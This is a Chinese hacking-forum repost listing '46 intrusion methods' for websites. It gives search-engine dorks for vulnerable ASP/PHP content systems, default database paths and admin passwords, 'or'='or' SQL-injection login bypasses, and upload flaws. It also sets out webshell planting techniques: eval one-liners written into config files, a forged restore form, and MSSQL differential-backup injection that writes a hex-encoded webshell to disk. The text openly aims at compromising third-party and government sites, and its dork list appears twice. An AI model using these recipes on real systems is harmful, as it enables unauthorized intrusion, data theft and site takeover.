入侵网站并不难,46种常见入侵方法

1,


到GoogLe,搜索一些关键字,edit.asp?    韩国肉鸡为多,多数为MSSQL数据库!


2,


到Google ,site:cq.cn inurl:asp


3,


利用挖掘鸡和一个ASP木马.


文件

名是login.asp


路径组是/manage/


关键词是 went.asp


用'or'='or'来登陆


4,


关键字:Co Net MIB Ver 1.0网站后台管理

系统

帐号密码为 'or'='or'


5.


动感购物系统


inurl:help.asp 登陆,如未注册成为会员!


upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞


6。


默 认数据库地址blogdata/acblog.asa


    关键字:acblog


7.


百度 /htdocs


注册里可以 直接上传asa文件!


8.


/Database/#newasp.mdb


关键词:NewAsp SiteManageSystem Version


9.


用挖掘机              


关键字:Powered by WEBBOY


页 面:/upfile.asp


10.


baidu中搜索关键字Ver5.0 Build 0519


(存在上传漏洞)


11.


Upfile_Article.asp bbs/upfile.asp


输入关键字:powered by mypower ,


12.


inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多

网站

13.


现在GOOGLE搜索关键字      intitle:网站小 助手 inurl:asp


14.


键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采装备


购买 站内流言 友情连接 本站

论坛

挖掘鸡的关键字 添    setup.asp


15.


VBulletin 论坛的数据库


默认数据库地址!


/includes/functions.php


工具:


1.网站猎手 下载地址:百度 Google!


2.Google


关键字:


Powered by: vBulletin Version 3.0.1


Powered by: vBulletin Version 3.0.2


Powered by: vBulletin Version 3.0.3


其 中一个就可以了


16.


1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart


open source。 这是一个商场系统。


2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下


~~comersus系统~


猜到,comersus.mdb. 是数据库名


数据库都是 放在database/ 后的,


所以database/comersus.mdb


comersus_listCategoriesTree.asp 换成database/comersus.mdb,不能下载。


那样把前一个''store/''除去,再加上database /comersus.mdb 试试


17.


无忧传奇官方站点程序。


          1、后台管理地址:http://您的域名 /msmiradmin/


          2、默认后台管理帐号:msmir


          3、默认后台管理密 码:msmirmsmir


数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb


数据库连接文件 为 ***********/Conn.asp


18.


百度里输入/skins/default/


19.


利用挖掘机


关 键机:power by Discuz


路径:/wish.php


配合:


Discuz!论坛 wish.php远程包含漏洞 工具使用


20.


上传漏洞.


工具 : Domain3.5


        网站猎手 1.5版


关键字 powered by mypower


检测的页面或文件插入upfile_photo.asp


21.


新云漏洞


这个漏洞 ACCESS和SQL版通吃。


Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接


- 网站地图 - 管理登录"


把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目 录。就


可以下载conn.asp


以源码,

软件

等下载站居多。


大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了


\database\%23newasp.mdb


如:#xzws.mdb 改成%23xzws.mdb


22.


通 吃所有商城+动力上传系统


使用工具:挖掘鸡 v1.1 明小子


商城入侵:


关键字:选购->加入购物车->去收银台 ->确认收货人信息->选付款方式->选配送


方式->在线支付或下单后汇款->汇款确认->发货-> 完成


漏洞页面:upload.asp


          upfile_flash.asp


动力入侵:


关键 字:powered by mypower


漏洞页面:upfile_photo.asp


          Upfile_Soft.asp


          upfile_adpic.asp


          upfile_softpic.asp


23.


注 射漏洞


百度搜索ioj's blog


24


动易


列目录


admin_articlerecyclebin.asp


inurl:admin_articlerecyclebin.asp


25.


工 具:网站猎手


关键词:inurl:Went.asp


后缀:manage/login.asp


口令:'or'='or'


26.


入 侵魔兽私服


需要的工具:ASP木马一只。


            Domain3.5明小子


关键字:All Right Reserved Design:游戏联盟


后台地址:admin/login.asp


数据库的地 址:chngame/#chngame.mdb


27.


漏洞是利用管理员iis设置的失误


用baidu 关键字就是比较罕见的脚本名


动网: ReloadForumCache.asp


Leadbbs: makealltopanc.asp


BBSXP: admin_fso.asp


动易: admin_articlerecyclebin.asp


28.


国外站的爆库漏洞


关 键字:sad Raven's Guestbook


密码地址:/passwd.dat


后台地址:/admin.php


29.


Discuz 4.1.0跨站漏洞


利用工具:1,WAP浏览器


          2,WAP编码转换器


关键字:"intextiscuz! 4.1.0"


30.


关键字:尚奈克斯


后台路径/system/manage.asp


直接传ASP木马


31.


工 具


1:网站猎手


2:大马一个


关键字:切勿关闭Cookies功能,否则您将不能登录


插入diy.asp


32.


关 键字:Team5 Studio All rights reserved


默认数据库:data/team.mdb


33.


工 具:      挖掘机 辅臣数据库读取器


关键字:    企业简介 产品展示产品列表


后缀添加: /database/myszw.mdb


后台地址: admin/Login.asp


34.


关键子    XXX inurl:Nclass.asp


在"系统设置"里写个木马。


会被保存到 在 config.asp内。


35.


不进后台 照样拿动网WEBSHELL


data.asp?action=BackupData          动网数据库备份默认路径


36.


工 具:网站猎手 WebShell


关键字:inurl:Went.asp


后缀:manage/login.asp


弱口 令:'or'='or'


37.


关键字owered byCDN_NEWS


随便扫遍文章加一个' ,来试探注入点


后台地 址:admin_index.asp


38.


入侵雷池新闻发布系统


关键字:leichinews


去掉leichinews 后面的.


打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp


再 上传马.....


进访问uppic anran.asp 登陆马.


39.


关键字ower System Of Article Management Ver 3.0 Build 20030628


默认数据 库:database\yiuwekdsodksldfslwifds.mdb


后台地址:自己扫描!


40.


一、通过 GOOGLE搜索找大量注入点


关键字:asp?id=1      gov.jp/ asp?id=


页数:100


语言:想入侵哪 个国家就填

什么

语言吧


41.


关键字:Powered by:94KKBBS 2005


利 用密码找回功能 找回admin


提问:ddddd 回答:ddddd


42.


关键字:inurl:Went.asp


后台为 manage/login.asp


后台密码: 'or'=' 或者 'or''=''or' 登录 进入


默认数据库地址 atabase/DataShop.mdb


43.


关键字:六合彩 inurl:readnews.asp


把最后一个/改成%5c ,直接暴库,看密码,进后台


随便添加个新闻 在标题输入我们的一句话木马


44.


工具:一句话木马


      BBsXp 5.0 sp1 管理员猜解器


关键词:powered by bbsxp5.00


进后台,备份一句话马!


45.


关键 字:程序核心:BJXSHOP网上开店专家


后台:/admin


46


批量入侵新云系统!


搜索关键词:关于本站 网站帮助 广告合作 下载声明 友情连接 网站


地图


找到以后缀添加:user/reg.asp


工具:啊D注入D_SQLTools2.0 和COOKIES欺骗工具


先来注册 发布个文章 得到的地址用啊D扫下 他默认的表段名字是NC_admin



转载请注明出自黑客 手册技术论坛

http://www.nohack.cn/bbs/

本 贴地址:

http://www.nohack.cn/bbs/thread-92388-1-1.html



一: 对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:


http://注入网址;update admin set password='新MD5密码' where password='旧MD5密码'-- [admin为表名.]



一、 直接上传获得webshell



  这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文件url应该是

http://forums/images/smiles/

下,前一阵子的联众游戏站和 网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blog后台可以可以直接上传.php文件,上传的文件路径有提示。以及一 年前十分流行的upfile.asp漏洞(动网5.0和6.0、早期的许多整站系统),因过滤上传文件不严,导致用户可以直接上传webshell到网站 任意可写目录中,从而拿到网站的管理员控制权限。



  二、添加修改上传类型



  现在很多的脚本程序上传模块不是只允 许上传合法文件类型,而大多数的系统是允许添加上传类型,bbsxp后台可以添加asa asP类型,ewebeditor的后台也可添加asa类型,通 过修改后我们可以直接上传asa后缀的webshell了,还有一种情况是过滤了.asp,可以添加.aspasp的文件类型来上传获得 webshell。php系统的后台,我们可以添加.php.g1f的上传类型,这是php的一个特性,最后的哪个只要不是已知的文件类型即可,php会 将php.g1f作为.php来正常运行,从而也可成功拿到shell。LeadBbs3.14后台获得webshell方法是:在上传类型中增加asp ,注意,asp后面是有个空格的,然后在前台上传ASP马,当然也要在后面加个空格!



  三、利用后台管理功能写入webshell



  上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入webshell。比较的典型的有 dvbbs6.0,还有leadbbs2.88等,直接在后台修改配置文件,写入后缀是asp的文件。而LeadBbs3.14后台获得webshell 另一方法是:添加一个新的友情链接,在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符,http:\\网站\inc\IncHtm \BoardLink.asp就是我们想要的shell。



  四、利用后台管理向配置文件写webshell



  利 用"""":""//"等符号构造最小马写入程序的配置文件,joekoe论坛,某某同学录,沸腾展望新闻系统,COCOON Counter统计程序等等,还有很多php程序都可以,COCOON Counter统计程序举例,在管理邮箱处添上

[email protected]

":eval request(chr (35))//, 在配制文件中就是webmail="

[email protected]

\":eval request(chr(35))//",还有一种方法就是写上

[email protected]

" %><%eval request(chr(35))%><%',这样就会形成前后对应,最小马也就运行了。<%eval request(chr(35))%>可以用lake2的eval发送端以及最新的2006 客户端来连,需要说明的是数据库插马时候要选前者。再如动易2005,到文章中心管理-顶部菜单设置-菜单其它特效,插入一句话马"%> <%execute request("l")%><%',保 存顶部栏目菜单参数设置成功后,我们就得到马地址http://网站/admin/rootclass_menu_config.asp。



   五、利用后台数据库备份及恢复获得webshell



  主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能, “备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改 为asp,从而得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样可以利用。还可以备份网站asp文件为其 他后缀 如.txt文件,从而可以查看并获得网页源代码,并获得更多的程序信息增加获得webshell的机会。在实际运用中经常会碰到没有上传功能的时 候,但是有asp系统在运行,利用此方法来查看源代码来获得其数据库的位置,为数据库插马来创造机会,动网论坛就有一个ip地址的数据库,在后台的ip管 理中可以插入最小马然后备份成.asp文件即可。在谈谈突破上传检测的方法,很多asp程序在即使改了后缀名后也会提示文件非法,通过在.asp文件头加 上gif89a修改后缀为gif来骗过asp程序检测达到上传的目的,还有一种就是用记事本打开图片文件,随便粘贴一部分复制到asp木马文件头,修改 gif后缀后上传也可以突破检测,然后备份为.asp文件,成功得到webshell。



  六、利用数据库压缩功能



   可以将数据的防下载失效从而使插入数据库的最小马成功运行,比较典型的就是loveyuki的L-BLOG,在友情添加的url出写上<%eval request (chr(35))%>, 提交后,在数据库操作中压缩数据库,可以成功压缩出.asp文件,用海洋的最小马的eval客户端连就得到一个webshell。




七、 asp+mssql系统



  这里需要提一点动网mssql版,但是可以直接本地提交来备份的。首先在发帖那上传一个写有asp代码的假 图片,然后记住其上传路径。写一个本地提交的表单,代码如下:



  <form action=http://网站/bbs/admin_data.asp?action=RestoreData&act=Restore method="post">



  <p>已上传文件的位置:<input name="Dbpath" type="text" size="80"></p>



  <p>要复制到的位置:<input name="backpath" type="text" size="80"></p>



  <p><input type="submit" value="提交"></p> </form>



  另存为.htm本地执行。把假图片上传路径填在“已上传文件的位置”那里,想要备份的WebShell的相对路径填写在“要复制到 的位置”那里,提交就得到我们可爱的WebShell了,恢复代码和此类似,修改相关地方就可以了。没有遇到过后台执行mssql命令比较强大的asp程 序后台,动网的数据库还原和备份是个摆设,不能执行sql命令备份webshell,只能执行一些简单的查询命令。可以利用mssql注入差异备份 webshell,一般后台是显示了绝对路径,只要有了注入点基本上就可以差异备份成功。下面是差异备份的主要语句代码,利用动网7.0的注入漏洞可以用 差异备份一个webshell,可以用利用上面提到的方法,将conn.asp文件备份成.txt文件而获得库名。



  差异备份的主要 代码:



  ;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s--



  ;Drop table [heige];create table [dbo].[heige] ([cmd] [image])--



   ;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--



   ;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--



  这段代码中,0x626273是要备份的库名bbs的十六进制,可以是其 他名字比如bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是<%execute request("l")%>的十六进制,是lp最小马;0x643A5C7765625C312E617370是d:\web\1.asp的十六进制, 也就是你要备份的webshell路径。当然也可以用比较常见备份方式来获得webshell,唯一的不足就是备份后的文件过大,如果备份数据库中有防下 载的的数据表,或者有错误的asp代码,备份出来的webshell就不会成功运行,利用差异备份是成功率比较高的方法,并且极大的减少备份文件的大小。



  八、php+mysql系统



  后台需要有mysql数据查询功能,我们就可以利用它执行SELECT ... INTO OUTFILE查询输出php文件,因为所有的数据是存放在mysql里的,所以我们可以通过正常手段把我们的webshell代码插入mysql在利用 SELECT ... INTO OUTFILE语句导出shell。


  就可以暴出路径,php环境中比较容易暴出绝对路径:)。提一点的是 遇到是mysql在win系统下路径应该这样写。下面的方法是比较常用的一个导出webshell的方法,也可以写个vbs添加系统管理员的脚本导出到启 动文件夹,系统重起后就会添加一个管理员帐号


  就会在up目录下生成文件名为saiy.php内容为的最小php木马, 最后用lanker的客户端来连接。实际运用中要考虑到文件夹是否有写权限。或者输入这样的代码 将会在当前目录生成一个a.php的最小马。



   九、phpwind论坛从后台到webshell的三种方式



  方式1 模板法



  进入后台, 风格模版设置 ,在随便一行写代码,记住,这代码必须顶着左边行写,代码前面不可以有任何字符。



  方始2 脏话过滤法



  方式3 用户等级管理



  以上三种方式得到webshellr的密码是a,为lanker的一句话后门服务端。



  十、也 可以利用网站访问计数系统记录来获得webshell



  解决方案



  由于本文涉及的代码版本很多,所以不可能提供 一个完美的解决方案。有能力者可以针对本文提到的漏洞文件进行适当修补,若漏洞文件不影响系统使用也可删除此文件。大家如果不会修补,可以到相关官方网站 下载最新补丁进行修复更新。同时也请大家能时刻关注各大

安全 网络

发布的最新公告,若自己发现相关漏洞也可及时通知官方网站




                                                             二 搜索肉机



1,


到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!


2,


到Google ,site:cq.cn inurl:asp


3,


利用挖掘鸡和一个ASP木马.


文件名是login.asp


路径组是 /manage/


关键词是went.asp


用'or'='or'来登陆


4,


关键字:Co Net MIB Ver 1.0网站后台管理系统


帐号密码为 'or'='or'


5.


动感购物系统


inurl:help.asp登陆,如未注册成 为会员!


upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞


6。


默认数据库 地址blogdata/acblog.asa


关键字:acblog


7.


百度 /htdocs


注册里可以直接上传asa文 件!


8.


/Database/#newasp.mdb


关键词:NewAsp SiteManageSystem Version


9.


用 挖掘机


关键字:Powered by WEBBOY


页面:/upfile.asp


10.


baidu中搜索关键字 Ver5.0 Build 0519


(存在上传漏洞)


11.


Upfile_Article.asp bbs/upfile.asp


输入关键字:powered by mypower ,


12.


inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站


13.


现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp


14.


键 字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采装备


购买 站内流言 友情连接 本站论坛


挖掘鸡的关键字 添 setup.asp


15.


VBulletin论坛的数据库


默认数据库地址!


/includes/functions.php


工 具:


1.网站猎手 下载地址:百度 Google!


2.Google


关键字:


Powered by: vBulletin Version 3.0.1


Powered by: vBulletin Version 3.0.2


Powered by: vBulletin Version 3.0.3


其中一个就可以了


16.


1.打开百度或GOOGLE搜索,输入 powered by comersus ASP shopping cart


open source。 这是一个商场系统。


2.网站的 最底部分,有个 Comersus Open Technologies LC。打开看下


~~comersus系统~


猜 到,comersus.mdb. 是数据库名


数据库都是放在database/ 后的,


所以database/comersus.mdb


comersus_listCategoriesTree.asp 换成database/comersus.mdb,不能下载。


那样把前一个''store/''除去,再加上database /comersus.mdb 试试


17.


无忧传奇官方站点程序。


1、后台管理地址:http://您的域名 /msmiradmin/


2、默认后台管理帐号:msmir


3、默认后台管理密码:msmirmsmir


数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb


数据库连接文件为 ***********/Conn.asp


18.


百 度里输入/skins/default/


19.


利用挖掘机


关键机:power by Discuz


路 径:/wish.php


配合:


Discuz!论坛 wish.php远程包含漏洞 工具使用


20.


上传漏洞.


工 具 : Domain3.5


网站猎手 1.5版


关键字powered by mypower


检测的页面或文件插入 upfile_photo.asp


21.


新云漏洞


这个漏洞ACCESS和SQL版通吃。


Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接


- 网站地图 - 管理登录"


把 flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就


可以下载 conn.asp


以源码,软件等下载站居多。


大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了


\database\%23newasp.mdb


如:#xzws.mdb 改成%23xzws.mdb


22.


通吃所有商城+动力上传系统


使用工具:挖掘鸡 v1.1 明小子


商城入侵:


关 键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送


方式->在线支付或下单 后汇款->汇款确认->发货->完成


漏洞页面:upload.asp


upfile_flash.asp


动力 入侵:


关键字:powered by mypower


漏洞页面:upfile_photo.asp


Upfile_Soft.asp


upfile_adpic.asp


upfile_softpic.asp


23.


注 射漏洞


百度搜索ioj's blog


24


动易


列目录


admin_articlerecyclebin.asp


inurl:admin_articlerecyclebin.asp


25.


工 具:网站猎手


关键词:inurl:Went.asp


后缀:manage/login.asp


口令:'or'='or'


26.


入 侵魔兽私服


需要的工具:ASP木马一只。


Domain3.5明小子


关键字:All Right Reserved Design:游戏联盟


后台地址:admin/login.asp


数据库的地址:chngame/#chngame.mdb


27.


漏 洞是利用管理员iis设置的失误


用baidu 关键字就是比较罕见的脚本名


动网: ReloadForumCache.asp


Leadbbs: makealltopanc.asp


BBSXP: admin_fso.asp


动易: admin_articlerecyclebin.asp


28.


国外站的爆库漏洞


关键字:sad Raven's Guestbook


密码地址:/passwd.dat


后台地址:/admin.php


29.


Discuz 4.1.0跨站漏洞


利用工具:1,WAP浏览器


2,WAP编码转换器


关键字:"intextiscuz! 4.1.0"


30.


关 键字:尚奈克斯


后台路径/system/manage.asp


直接传ASP木马


31.


工具


1:网站猎手


2: 大马一个


关键字:切勿关闭Cookies功能,否则您将不能登录


插入diy.asp


32.


关键字:Team5 Studio All rights reserved


默认数据库:data/team.mdb


33.


工具: 挖掘机 辅臣数据库读取器


关键字: 企业简介 产品展示产品列表


后缀添加: /database/myszw.mdb


后台地址: admin/Login.asp


34.


关键子 XXX inurl:Nclass.asp


在"系统设置"里写个木马。


会 被保存到 在 config.asp内。


35.


不进后台照样拿动网WEBSHELL


data.asp?action=BackupData 动网数据库备份默认路径


36.


工具:网站猎手 WebShell


关键字:inurl:Went.asp


后 缀:manage/login.asp


弱口令:'or'='or'


37.


关键字owered byCDN_NEWS


随便 扫遍文章加一个' ,来试探注入点


后台地址:admin_index.asp


38.


入侵雷池新闻发布系统


关键 字:leichinews


去掉leichinews后面的.


打 上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp


再上传 马.....


进访问uppic anran.asp 登陆马.


39.


关键字ower System Of Article Management Ver 3.0 Build 20030628


默认数据 库:database\yiuwekdsodksldfslwifds.mdb


后台地址:自己扫描!


40.


一、通过 GOOGLE搜索找大量注入点


关键字:asp?id=1 gov.jp/ asp?id=


页数:100


语言:想入侵哪个国家就填 什么语言吧


41.


关键字:Powered by:94KKBBS 2005


利用密码找回功能 找回admin


提 问:ddddd 回答:ddddd


42.


关键字:inurl:Went.asp


后台为manage/login.asp


后 台密码: 'or'=' 或者 'or''=''or' 登录 进入


默认数据库地址atabase/DataShop.mdb


43.


关 键字:六合彩 inurl:readnews.asp


把最后一个/改成%5c ,直接暴库,看密码,进后台


随便添加个新闻 在标题输入我们的一句话木马


44.


工具:一句话木马


BBsXp 5.0 sp1 管理员猜解器


关键词:powered by bbsxp5.00


进后台,备份一句话马!


45.


关键字:程序核心:BJXSHOP网上开店专家


后 台:/admin


46


批量入侵新云系统!


搜索关键词:关于本站 网站帮助 广告合作 下载声明 友情连接 网站


地图


找 到以后缀添加:user/reg.asp


工具:啊D注入D_SQLTools2.0和COOKIES欺骗工具


先来注册 发布个文章 得到的地址用啊D扫下 他默认的表段名字是NC_admin









键字:Power WenDay Ver1.0


添加: /db/PW_SYS_Data.mdb


关键字:powered by WEBBOY


添加: /upfile.asp


关键字:Powered By :SMT Version 5.0


添加: /bbs/upfile.asp /upfile_flash.asp


关键字:team5 studio all rights reserved


添加: /data/team.mdb


关键字:传奇私服


添加: /msmirdata/msmirArticle.mdb(默认数据库)


后 台管理地址:http;//您的域名/msmiradmin/


关键字:同城约会 贺卡传情 情感随笔 热门投票


添加: /admin/upload_file.asp (明小子上传)


关键字: 公司后台


添加: /manage/Login.asp (用"or"="or")


关键字:企业邮局 企业荣誉 营销网络 产品分类 信息反馈 联系我们 收藏本站 网站管理


添加: /admin/login.asp (后台管理地址,管理员帐号密码=admin)


关键字:by wygk


添加:/data /scadata.mdzhaozhon


关键字: Power System Of Article Management Ver 3.0 Build 20030628


添加: /database\yiuwekdsodksldfslwifds.mdb (后台的后缀全是/admin_index.asp)



关键字: Foosun


添加: /Foosun_Data/FS400.mdbAdmin/login.asp (后台的后缀全是admin/login.asp)


关键 字:Powered By Kesion Inc


默认数据库 ks_data/ks_database.mdb


关键字: inurl:qq.txt (啊拉)


inurl:Mz.txt (极限居)


inurlQCJB.txt (QQ冲击波)


inurl:qqnum.txt (完美)


1、如在网站中找到诸如:“请登录后再使用本功能!”这样的就可以用明小子上传试试


2、使用明小子上传时选择“动力上传漏洞— /upfile_softpic.asp页面”



明小子关键词:


1.ProductShow.asp?ArticleID=


2.inurl:show_news.asp?id=


3.site inurl:Article_Print.asp


9.4.edit.asp?


5.site:cq.cn inurl:asp


6.intitle: 网站小助手


7.powered by comersus ASP shopping cart


open source


8./skins/default/


9. 动力上传系统


10.oioj's blog


11.动网: ReloadForumCache.asp


12."intext:Discuz! 4.1.0"


13.尚奈克斯


14.Team5 Studio All rights reserved


15.XXX inurl:Nclass.asp


16.Powered by:QCDN_NEWS


17.发布系统


18.asp?id=1


19.Powered by:94KKBBS 2005


20.inurl:readnews.asp


21.程序核心


经典的用户名密码


'or'='or'


'or'1'='1


这 2个密码在很多网站后台,QQ空间相册都可以登陆,不过不是100%而已....


inurl: 用于搜索网页上包含的URL. 这个语法对寻找网页上的搜索,帮助之类的很有用.


intext: 只搜索网页<body>部分中包含的文字(也就是忽略了标题,URL等的文字).


site: 可以限制你搜索范围的域名.

你可能感兴趣的:(职场,关键字,休闲)